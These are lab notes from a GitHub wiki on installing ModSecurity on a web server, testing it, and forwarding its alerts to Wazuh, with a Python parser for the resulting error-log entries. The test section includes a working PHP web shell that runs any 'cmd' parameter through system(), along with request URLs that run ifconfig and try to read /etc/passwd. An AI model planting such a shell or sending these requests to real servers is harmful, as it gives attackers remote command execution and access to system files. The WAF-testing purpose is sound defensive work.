Lab 5.1: Wazuh WAF - squatchulator/Tech-Journal GitHub Wiki

Lab 5.1 - Wazuh WAF

Initial Firewall Rules

  • Make sure that the firewall allows traffic from established connections via DMZ-to-WAN, and back through WAN-to-DMZ. Check with
    • show firewall name DMZ-to-WAN rule 1 && show firewall name WAN-to-DMZ rule 1
  • Add a temporary rule 999 to DMZ-to-WAN so that Web01 (172.16.50.3) can reach the package repositories for the install (it is removed again below):
set firewall name DMZ-to-WAN rule 999 action accept
set firewall name DMZ-to-WAN rule 999 source address 172.16.50.3
commit
save

Adding mod_security

On Web01:

sudo yum install mod_security mod_security_crs php php-common php-opcache php-cli php-gd php-curl php-mysqlnd -y

Now, go back to Fw01 and delete that rule you just made.

delete firewall name DMZ-to-WAN rule 999
commit
save

On Web01, restart httpd and check loading of mod_security:

sudo systemctl restart httpd
sudo httpd -M | grep security2
sudo cat /var/log/httpd/error_log | grep ModSecurity

Testing ModSecurity

Attempt a curl of your web server from Rw01. It should return the contents of the page.

Create a test PHP web shell on Web01

sudo nano /var/www/html/shell.php

In the new php file:

<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd']);
    }
?>
</pre>
</body>
</html>

Restart httpd and attempt to use the PHP web shell with:

  • 172.16.50.3/shell.php?cmd=%2Fsbin%2Fifconfig

You should not be able to access /etc/passwd when you try:

  • 172.16.50.3/shell.php?cmd=%2Fsbin%2Fcat%2F/etc/passwd

Check the error logs associated with /etc/passwd on Web01 with:

  • sudo cat /var/log/httpd/error_log | grep passwd

This error should appear in Wazuh as well.
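An added example (not part of the lab notes) that parses the ModSecurity entries in /var/log/httpd/error_log into the fields a Wazuh decoder or a quick triage script would surface: client, rule id, message, URI, and whether the request was actually denied (403) or only logged as a warning. The log lines, client IP, rule ids and unique_id values inside it are constructed for the example.

```python
import re
from collections import Counter
# Constructed sample of the Apache error_log lines ModSecurity 2.x writes on Web01.
# Timestamps, client IP, unique_id values and rule ids are illustrative, not captured.
SAMPLE_ERROR_LOG = "\n".join([
    '[Sat Apr 01 12:00:01.123456 2023] [:error] [pid 1234] [client 10.0.17.8:54321] '
    '[client 10.0.17.8] ModSecurity: Warning. Pattern match "ifconfig" at ARGS:cmd. '
    '[file "/etc/httpd/modsecurity.d/activated_rules/example-rce.conf"] [line "12"] '
    '[id "900001"] [msg "Unix command in argument"] [severity "WARNING"] '
    '[hostname "172.16.50.3"] [uri "/shell.php"] [unique_id "AAAA0001"]',
    '[Sat Apr 01 12:00:05.000000 2023] [:error] [pid 1234] [client 10.0.17.8:54322] '
    '[client 10.0.17.8] ModSecurity: Access denied with code 403 (phase 2). '
    'Matched phrase "etc/passwd" at ARGS:cmd. [file "/etc/httpd/modsecurity.d/'
    'activated_rules/example-lfi.conf"] [line "40"] [id "900002"] '
    '[msg "OS File Access Attempt"] [data "Matched Data: etc/passwd found within '
    'ARGS:cmd: /sbin/cat //etc/passwd"] [severity "CRITICAL"] [tag "attack-lfi"] '
    '[tag "OWASP_CRS"] [hostname "172.16.50.3"] [uri "/shell.php"] [unique_id "AAAA0002"]',
    '[Sat Apr 01 12:00:07.000000 2023] [mpm_prefork:notice] [pid 1000] '
    'AH00163: Apache/2.4.6 configured -- resuming normal operations',
])
CLIENT_RE = re.compile(r'\[client (\d{1,3}(?:\.\d{1,3}){3})(?::\d+)?\]')
DENIED_RE = re.compile(r'Access denied with code (\d{3})')
FIELD_RE = re.compile(r'\[([a-z_]+) "((?:[^"\\]|\\.)*)"\]')  # [key "value"] pairs

def parse_modsec_line(line):
    """Turn one error_log line into a dict; None for lines ModSecurity did not write."""
    if "ModSecurity:" not in line:
        return None
    client = CLIENT_RE.search(line)
    denied = DENIED_RE.search(line)
    event = {"client": client.group(1) if client else None,
             "status": int(denied.group(1)) if denied else None, "tags": []}
    # Bracketed key/value fields follow the free-text reason; 'tag' may repeat.
    for key, value in FIELD_RE.findall(line.split("ModSecurity:", 1)[1]):
        if key == "tag":
            event["tags"].append(value)
        else:
            event[key] = value
    return event

def parse_error_log(text):
    """Parse an error_log dump, keeping only ModSecurity events."""
    return [e for e in map(parse_modsec_line, text.splitlines()) if e]

def denied_by_client(events):
    """Count blocked (403) requests per source IP, the view you would alert on in Wazuh."""
    return Counter(e["client"] for e in events if e["status"] == 403)

def events_mentioning(events, needle):
    """Same idea as 'grep passwd error_log', but over the parsed msg/data fields."""
    return [e for e in events if needle in (e.get("msg", "") + e.get("data", ""))]
```

Feeding the real error_log through parse_error_log shows which hits were warning-only (request still served) versus denied, which is the difference between the ifconfig request and the /etc/passwd request in the test above.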